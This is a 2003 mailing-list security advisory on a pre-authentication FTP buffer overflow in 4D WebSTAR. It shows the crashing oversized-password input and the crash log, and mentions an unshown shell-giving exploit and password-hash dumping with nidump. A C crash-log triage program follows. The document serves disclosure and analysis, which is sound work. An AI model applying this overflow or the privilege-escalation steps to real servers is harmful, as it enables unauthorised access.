Full Disclosure mailing list archives
4D WebSTAR FTP Buffer Overflow.
From: B-r00t <br00t () blueyonder co uk>
Date: Thu, 11 Sep 2003 21:01:09 +0100 (BST)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Remote Vulnerability in 4D WebSTAR Server Suite.
================================================

Date:      11.09.2003
Author:    B-r00t. 2003.
Email:     B-r00t <br00t () blueyonder co uk>
Vendor:    4D.
Reference: http://www.4d.com/products/webstar.html
Versions:  4D WebSTAR 5.3.1 (Latest) => VULNERABLE.
Tested:    4D WebSTAR 5.3.1 (Trial Version).
Exploit:   [attached] 4DWS_ftp.c - Gives a shell on port 6969.

Description:

There is a pre authentication buffer overflow that exists in the login
mechanism of the WebSTAR FTP service. As shown below: -

$ ftp maki
Connected to maki (192.168.0.69).
220 FTP server ready.
Name (maki:br00t): test
331 User name OK, need password.
Password: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXabcd
530 FTP login failed.
Login failed.
421 Service not available, remote server has closed connection

The following information is reported in the crash logfile
'/Users/webstar/Library/Logs/CrashReporter/WSWebServer.crash.log'

**********

Date/Time:  2003-09-08 09:25:24 +0100
OS Version: 10.2.6 (Build 6L60)
Host:       maki

Command:    WSWebServer
PID:        359

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_INVALID_ADDRESS (0x0001) at 0x61626364

PPC Thread State:
  srr0: 0x61626364 srr1: 0x4000f030 vrsave: 0x00000000
   xer: 0x00000000   lr: 0x61626364  ctr: 0x90000e40   mq: 0x00000000
    r0: 0x61626364   r1: 0xf02874f0   r2: 0xa0007728   r3: 0xf0288cd0
    r4: 0xf02872e0   r5: 0x0000005e   r6: 0x80808080   r7: 0x00000001
    r8: 0x30000000   r9: 0x00954e64  r10: 0xf02870aa  r11: 0x00959e94
   r12: 0x00000000  r13: 0x00000000  r14: 0x00000000  r15: 0x00000000
   r16: 0x00000000  r17: 0x00000000  r18: 0x00000000  r19: 0x00000000
   r20: 0x00000000  r21: 0x00000000  r22: 0x00000000  r23: 0x0000000b
   r24: 0x00958fec  r25: 0x00958fec  r26: 0x58585858  r27: 0x58585858
   r28: 0x58585858  r29: 0x58585858  r30: 0x58585858  r31: 0x58585858

As can be seen from the crash dump, the application has attempted to
execute code at '0x61626364' which is ASCII code for 'abcd'. Being able
to influence the application's execution process means it is possible
for an attacker to execute arbitrary code and thus gain access to the
target machine.

Fortunately, the service is running as the 'webstar' user which is not
an administrative account by default. However, once an attacker has
gained initial access to the target machine, it is possible to access
the system password hashes using the 'nidump' utility and hence possibly
gain admin (root) privileges if these hashes are cracked.

FIX:    Disable the FTP service until a fix is available.

Status: Vendor informed 08.09.2003.

- --
B#.
- ----------------------------------------------------
Email : B-r00t <br00t () blueyonder co uk>
Key fingerprint = 74F0 6A06 3E57 083A 4C9B ED33 AD56 9E97 7101 5462
"You Would Be Paranoid If They Were Watching You !!!"
- -----------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (OpenBSD)

iD8DBQE/YNSOrVael3EBVGIRAnkOAKDC81IlxG6v05ctDdGqJWU7+kekagCfaSpH
elBa7Jmca+z8ralZp6tDgwQ=
=4WHc
-----END PGP SIGNATURE-----
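The triage reasoning in the post (a program counter of 0x61626364 decodes to the big-endian bytes 'abcd', so the login input has overwritten a saved return address and controls execution) can be turned into a small crash-log checker. The C program below is an added example, not part of the original message and not the attached 4DWS_ftp.c: it embeds the PPC register lines quoted above as a constructed sample, parses "name: 0xvalue" pairs, and flags every register whose four bytes are all printable ASCII. Function names, the sample array and the list of inspected registers are my own choices; the register values are the ones from the advisory.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: the register lines from the advisory's crash log,
 * reduced to the ones that matter for triage. */
const char *sample_dump[] = {
    "srr0: 0x61626364 srr1: 0x4000f030 vrsave: 0x00000000",
    "xer: 0x00000000 lr: 0x61626364 ctr: 0x90000e40 mq: 0x00000000",
    "r0: 0x61626364 r1: 0xf02874f0 r2: 0xa0007728 r3: 0xf0288cd0",
    "r24: 0x00958fec r25: 0x00958fec r26: 0x58585858 r27: 0x58585858",
    "r28: 0x58585858 r29: 0x58585858 r30: 0x58585858 r31: 0x58585858",
    NULL
};

/* Registers worth inspecting on PPC: the faulting PC (srr0), the link
 * register the epilogue restored (lr), and the callee-saved registers
 * that a stack overwrite clobbers on the way to the return address. */
const char *triage_names[] = { "srr0", "lr", "r26", "r27", "r28", "r29", "r30", "r31" };
const int triage_count = 8;

/* Decode a 32-bit value as four big-endian bytes (PPC byte order) into buf.
 * Returns 1 when every byte is printable ASCII, the signature of a register
 * that was filled from text input rather than by the program itself. */
int word_is_printable_ascii(uint32_t v, char buf[5]) {
    int all_printable = 1;
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)(v >> (8 * (3 - i)));
        buf[i] = (char)b;
        if (!isprint(b)) all_printable = 0;
    }
    buf[4] = '\0';
    return all_printable;
}

/* Locate "<name>: 0x<hex>" in one line. The boundary check stops "r1" from
 * matching inside "srr1" or "r10". Returns 1 and sets *out on success. */
int find_register(const char *line, const char *name, uint32_t *out) {
    size_t n = strlen(name);
    const char *p = line;
    while ((p = strstr(p, name)) != NULL) {
        int boundary = (p == line) || !isalnum((unsigned char)p[-1]);
        if (boundary && strncmp(p + n, ": 0x", 4) == 0) {
            unsigned long val;
            if (sscanf(p + n + 4, "%lx", &val) == 1) {
                *out = (uint32_t)val;
                return 1;
            }
        }
        p += n;
    }
    return 0;
}

/* Search every line of the dump for a register by name. */
int lookup_register(const char **lines, const char *name, uint32_t *out) {
    for (int i = 0; lines[i] != NULL; i++)
        if (find_register(lines[i], name, out)) return 1;
    return 0;
}

/* 1 if the named register holds all-printable bytes, 0 if not,
 * -1 if the register is absent from the dump. */
int register_is_ascii(const char **lines, const char *name) {
    uint32_t v;
    char ascii[5];
    if (!lookup_register(lines, name, &v)) return -1;
    return word_is_printable_ascii(v, ascii);
}

/* Number of inspected registers that look input-controlled; -1 if any is
 * missing, so an incomplete dump is never mistaken for a clean one. */
int count_ascii_controlled(const char **lines, const char **names, int n) {
    int hits = 0;
    for (int i = 0; i < n; i++) {
        int r = register_is_ascii(lines, names[i]);
        if (r < 0) return -1;
        hits += r;
    }
    return hits;
}

int main(void) {
    for (int i = 0; i < triage_count; i++) {
        uint32_t v;
        char ascii[5];
        if (!lookup_register(sample_dump, triage_names[i], &v)) continue;
        if (word_is_printable_ascii(v, ascii))
            printf("%-5s 0x%08x printable \"%s\"\n", triage_names[i], v, ascii);
        else
            printf("%-5s 0x%08x not printable\n", triage_names[i], v);
    }
    printf("%d of %d inspected registers look input-controlled\n",
           count_ascii_controlled(sample_dump, triage_names, triage_count),
           triage_count);
    return 0;
}
```

On the advisory's dump every inspected register comes back printable: srr0 and lr decode to "abcd" and r26 through r31 to "XXXX", which is exactly the pattern of a saved-register area and return address overwritten by the oversized password. A register such as r1 (the stack pointer, 0xf02874f0) fails the check, as a genuine address should.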
Attachment:
4DWS_ftp.c